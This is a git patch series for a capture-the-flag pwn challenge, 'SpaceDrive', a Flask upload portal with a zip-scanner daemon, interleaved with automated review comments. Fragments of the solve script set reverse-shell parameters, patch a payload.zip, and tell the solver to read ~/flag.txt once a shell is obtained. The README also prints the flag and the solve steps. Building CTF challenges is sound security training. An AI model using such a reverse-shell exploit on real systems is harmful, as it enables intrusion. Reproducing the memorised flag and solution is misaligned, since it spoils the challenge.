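Review bot: The last line of this hunk turns `app.run(debug=False)` back into `app.run(debug=True)`, which re-enables the Werkzeug interactive debugger whenever the module is started directly; the container launches the app through `flask run`, so this branch is probably not reached there, but the default should remain `app.run(debug=False)`. Separately, `success` is assigned only in the branches visible here; the first `if` branch sits above the hunk and is untouched by this commit, so if it only sets `message` the final `render_template(...)` call would fail on an unbound `success`. Initialising `success = False` before the `try` would cover that path. `upload()` starts above this hunk.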
@@ -26,33 +26,54 @@ form { text-align: center; } + + + + + + +/* Hide the default file input button */ input[type="file"] { - margin-bottom: 20px; /* Adjust margin-bottom to create space below the input */ - margin-top: 20px; /* Add margin-top to create space above the input */ - padding: 10px; - border: 2px solid #ddd; + display: none; +} + +/* Style the custom file input button */ +.custom-file-upload { + border: 2px solid #00BFFF; border-radius: 5px; - width: 80%; - display: block; - margin: 0 auto; - background-color: #1a1a33; - color: #ffffff; + padding: 10px 20px; + background-color: transparent; + color: #00BFFF; + font-size: 16px; + cursor: pointer; + transition: background-color 0.3s, border-color 0.3s, color 0.3s; + margin-right: 10px; } -input[type="file"]::placeholder { - color: #ffffff; +.custom-file-upload:hover { + background-color: #00BFFF; + /* Light blue background on hover */ + color: #FFFFFF; + /* White text color on hover */ } +.custom-file-upload:focus { + outline: none; + /* Remove default focus outline */ + border-color: #1E90FF; + /* Darker blue border color on focus */ +} input[type="submit"] { + border: 2px solid #00BFFF; + border-radius: 5px; + padding: 10px 20px; background-color: #00ccff; color: #ffffff; - padding: 10px 20px; - border: none; - border-radius: 5px; cursor: pointer; font-size: 16px; transition: background-color 0.3s; + margin-left: 10px; } input[type="submit"]:hover { 
@@ -70,9 +91,51 @@ input[type="submit"]:hover { } .note { - font-size: 14px; - color: #666; - margin-top: 10px; + font-size: 16px; + color: #FFFFFF; + /* White color for visibility */ + margin-top: 20px; text-align: center; font-style: italic; + border: 2px solid #FFFFFF; + /* White border */ + padding: 10px; + border-radius: 5px; + background-color: rgba(0, 0, 0, 0.5); + /* Semi-transparent black background */ + box-shadow: 0px 0px 10px rgba(255, 255, 255, 0.2); + /* Add shadow for depth */ +} + +.success { + background-color: #c9e6c9; + color: #008000; + border: 1px solid #4caf50; +} + +.error { + background-color: #f8d7da; + color: #721c24; + border: 1px solid #f5c6cb; +} + +/* CSS for "go back to home page" link */ +.back-link { + display: inline-block; + margin-top: 20px; + text-decoration: none; + padding: 10px 20px; + background-color: #007bff; + /* Blue background color */ + color: #fff; + /* White text color */ + border-radius: 5px; + transition: background-color 0.3s, color 0.3s; +} + +.back-link:hover { + background-color: #0056b3; + /* Darker blue background color on hover */ + color: #fff; + /* White text color on hover */ } \ No newline at end of file diff --git a/src/webapp/templates/index.html b/src/webapp/templates/index.html index 290eef4..4ff4374 100644 --- a/src/webapp/templates/index.html +++ b/src/webapp/templates/index.html @@ -11,25 +11,27 @@
-

Satellite File Upload

-

Welcome to the Satellite File Upload portal. This portal allows you to securely upload files to our satellite +

SpaceDrive 🛰️

+

Welcome to the SpaceDrive portal. This service allows you to securely upload files to our satellite systems orbiting Earth.

-

Our satellites are equipped with advanced sensors and instruments that collect various types of data, - including weather patterns, environmental changes, and astronomical observations. To ensure the smooth - operation of these satellites, it's essential to regularly upload firmware updates, configuration files, and - scientific data.

-

Using this portal, you can securely transmit files to our satellites from anywhere on Earth. Once uploaded, - our satellite communication systems will process and integrate the data seamlessly into our satellite - networks.

-
- - -

Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a - specific tool to scan zip files.

+

Using this portal, you can securely transmit files to our satellites from anywhere on Earth. 🌏

+ +

Note: Submitted files will be scanned to detect malicious patterns. Our team has developed a + specific tool to scan zip files.

+ + + + +
-
-
+ +
+ 🚀🚀🚀 +
\ No newline at end of file diff --git a/src/webapp/templates/upload_status.html b/src/webapp/templates/upload_status.html new file mode 100644 index 0000000..c9792df --- /dev/null +++ b/src/webapp/templates/upload_status.html @@ -0,0 +1,17 @@ + + + + + + Upload Status + + + +
+
+ {{ message }} +
+ Go back to upload page +
+ + From 2fa66f3860c7444712016e69b75fb84ee748a828 Mon Sep 17 00:00:00 2001 From: atxr Date: Tue, 5 Mar 2024 11:27:36 +0100 Subject: [PATCH 08/10] Start mineziperd from app --- Dockerfile | 6 ++---- solve/solve.py | 2 +- src/webapp/app.py | 17 ++++++++++++++--- 3 files changed, 17 insertions(+), 8 deletions(-) diff --git a/Dockerfile b/Dockerfile index ddea988..dba7866 100644 --- a/Dockerfile +++ b/Dockerfile @@ -4,19 +4,17 @@ RUN apt update && apt install python3-pip ncat -y RUN useradd -m -s /bin/bash user -# USER user +USER user WORKDIR /home/user COPY dist/mineziperd . COPY src/webapp webapp COPY flag.txt . -RUN ./mineziperd & - WORKDIR /home/user/webapp RUN pip install -r requirements.txt EXPOSE 5000 ENV FLASK_APP=app.py -CMD ["flask", "run", "--host", "0.0.0.0"] +CMD ["python3", "-m", "flask", "run", "--host", "0.0.0.0"] diff --git a/solve/solve.py b/solve/solve.py index 01a091c..b1d25d2 100644 --- a/solve/solve.py +++ b/solve/solve.py @@ -13,7 +13,7 @@ port = 5000 url = f"http://{ip}:{port}/upload" # Reverse shell params -ip = "127.0.0.1" +my_ip = "127.0.0.1" my_port = 9001 diff --git a/src/webapp/app.py b/src/webapp/app.py index 056b788..86e8387 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -3,6 +3,8 @@ import socket from struct import pack, unpack import hashlib import sys +import time +import os PORT = 8989 @@ -27,9 +29,18 @@ def upload(): hash = hashlib.sha256(buf).digest() # Scan file - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.settimeout(10) - s.connect(("localhost", PORT)) + while True: + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(10) + s.connect(("localhost", PORT)) + break + + except: + print("Restarting mineziper service", file=sys.stdout) + os.system("killall mineziperd") + os.system("~/mineziperd &") + time.sleep(1) s.send(pack("I", len(buf))) s.send(buf) From f9d73bfb687c22c73d5c6a45b2388687413da3b0 Mon Sep 17 00:00:00 2001 
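Review bot: With `RUN ./mineziperd &` removed, the image depends on app.py to launch and kill the scanner, but the package line above still installs only `python3-pip` and `ncat`; `killall` ships in `psmisc` on Ubuntu, so unless the base image already carries it the `killall mineziperd` call in app.py fails quietly. The exec-form `CMD` also makes `python3` PID 1, so scanner processes that app.py backgrounds and later kills are never reaped; running with `docker run --init`, or putting an init such as `tini` in front of the command, handles that. Pinning `FROM ubuntu:22.04` by digest would additionally keep rebuilds of the challenge comparable.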
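Review bot: The new `while True:` retry in app.py has no upper bound and a bare `except:`, so if `~/mineziperd` cannot start (missing binary, port 8989 already taken) an upload request spins forever, holding a worker and leaking one socket per attempt. I would cap the attempts, catch `OSError` only, close the failed socket, and return the existing "Failed to scan file" status when the scanner stays down. `upload()` begins and ends outside this hunk, so the fence shows only the rewritten connection loop.

```python
    # Scan file
    s = None
    for _ in range(3):  # bounded: a scanner that never starts must not hang the request
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(10)
        try:
            s.connect(("localhost", PORT))
            break
        except OSError:
            s.close()  # do not leak one descriptor per failed attempt
            s = None
            print("Restarting mineziper service", file=sys.stdout)
            os.system("killall mineziperd")
            os.system("~/mineziperd &")
            time.sleep(1)
    if s is None:
        return render_template('upload_status.html', message='Error: Failed to scan file', success=False)
    # … unchanged: send length and buffer, read status …
```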
From: atxr Date: Tue, 5 Mar 2024 11:57:05 +0100 Subject: [PATCH 09/10] Add more generic params --- solve/solve.py | 5 +++-- src/webapp/app.py | 4 ++-- src/webapp/static/styles.css | 6 ------ 3 files changed, 5 insertions(+), 10 deletions(-) diff --git a/solve/solve.py b/solve/solve.py index b1d25d2..077d9af 100644 --- a/solve/solve.py +++ b/solve/solve.py @@ -8,12 +8,12 @@ import zipfile ############## # Victim params -ip = "127.0.0.1" +ip = "X.X.X.X" port = 5000 url = f"http://{ip}:{port}/upload" # Reverse shell params -my_ip = "127.0.0.1" +my_ip = "X.X.X.X" my_port = 9001 @@ -127,6 +127,7 @@ with open("payload.zip", "wb") as zipf: print("payload.zip patched") print("You can start listening on port ", str(my_port)) +print("Once you get the shell, `cat ~/flag.txt`") input("Press any key when you are ready...") print("Sending payload...") diff --git a/src/webapp/app.py b/src/webapp/app.py index 86e8387..dc03205 100644 --- a/src/webapp/app.py +++ b/src/webapp/app.py @@ -38,9 +38,9 @@ def upload(): except: print("Restarting mineziper service", file=sys.stdout) - os.system("killall mineziperd") + os.system("pkill mineziperd") os.system("~/mineziperd &") - time.sleep(1) + time.sleep(5) s.send(pack("I", len(buf))) s.send(buf) diff --git a/src/webapp/static/styles.css b/src/webapp/static/styles.css index bfad1c0..53ebb70 100644 --- a/src/webapp/static/styles.css +++ b/src/webapp/static/styles.css @@ -26,12 +26,6 @@ form { text-align: center; } - - - - - - /* Hide the default file input button */ input[type="file"] { display: none; From 3de61a11fcd4661ee0a49ff653c9a54c0add49f5 Mon Sep 17 00:00:00 2001 From: atxr Date: Tue, 5 Mar 2024 12:11:45 +0100 Subject: [PATCH 10/10] Add challenge description --- README.md | 20 +++++++++++++++++++- flag.txt | 2 +- 2 files changed, 20 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 02ea339..ec4d066 100644 --- a/README.md +++ b/README.md 
@@ -5,4 +5,22 @@ ```bash sudo docker build -t chall . sudo docker run --rm -p 5000:5000 -it chall -``` \ No newline at end of file +``` + +## :triangular_flag_on_post: Challenge Informations + + + +| **Title** | Notebook | +| ------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| **Category** | pwn | +| **Description** | To upload the firmware updates to our satellites, we deplopped SpaceDrive, a safe file uploader across the stars. Because we experienced many issues with malicious ZipFiles in the past, our security team also developped a zip scanner to detected embeded malware. Will you be able to break it to take control of the satellite? | +| **Author** | atxr | +| **Difficulty (/10)** | 8 | +| **Is Remote** | Yes | +| **Has attachments** | Yes | +| **Estimated solve time** | ~2h | +| **Solve instructions** | First modify the victim/attacker ip in `solve/solve.py`. Then `cd solve && python3 solve.py` and follow the instructions | +| **Flag** | **`THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R}`** | +| **Deploy** | `sudo docker build -t spacedrive . && sudo docker run --rm -p 5000:5000 -it spacedrive` | + diff --git a/flag.txt b/flag.txt index b1cd7ba..02e6956 100644 --- a/flag.txt +++ b/flag.txt @@ -1 +1 @@ -THCon{Coucou} \ No newline at end of file +THCon{WH3N_y0U_4N7iVIrus_IS_4C7U4LLY_4_84cKd00R} \ No newline at end of file